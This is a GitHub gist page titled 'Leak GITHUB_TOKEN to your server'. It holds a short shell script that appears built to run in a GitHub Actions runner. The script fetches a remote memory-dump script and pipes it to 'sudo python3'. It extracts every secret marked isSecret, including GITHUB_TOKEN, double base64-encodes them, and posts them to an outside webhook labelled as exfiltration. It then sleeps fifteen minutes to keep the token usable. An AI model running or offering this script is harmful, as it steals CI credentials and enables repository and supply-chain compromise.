Last active
December 12, 2025 19:40
-
-
Save arunstar/ce3d6ef0b82e8f48fff13bd3ad28cc1a to your computer and use it in GitHub Desktop.
Leak GITHUB_TOKEN to your server
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Uses memory dump technique from github.com/nikitastupin/pwnhub / with regex to parse out all secret values (including GITHUB_TOKEN) | |
| B64_BLOB=`curl -sSf https://gist.githubusercontent.com/arunstar/dffd5ddde164203c22a49f6a2cccc398/raw/574e7e6718b4242772d3634fe7f8040e6dbca8b0/memdump.py | sudo python3 | tr -d '\0' | grep -aoE '"[^"]+":\{"value":"[^"]*","isSecret":true\}' | sort -u | base64 -w 0 | base64 -w 0` | |
| # Print to run log | |
| echo $B64_BLOB | |
| # Exfil to Burp | |
| curl -s -d "$B64_BLOB" https://little-feather-2780.tines.com/webhook/your-first-story/7f0d2f910d839f306a9ce9b810f61ab8 > /dev/null | |
| # Sleep for 15 mins | |
| sleep 900 |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment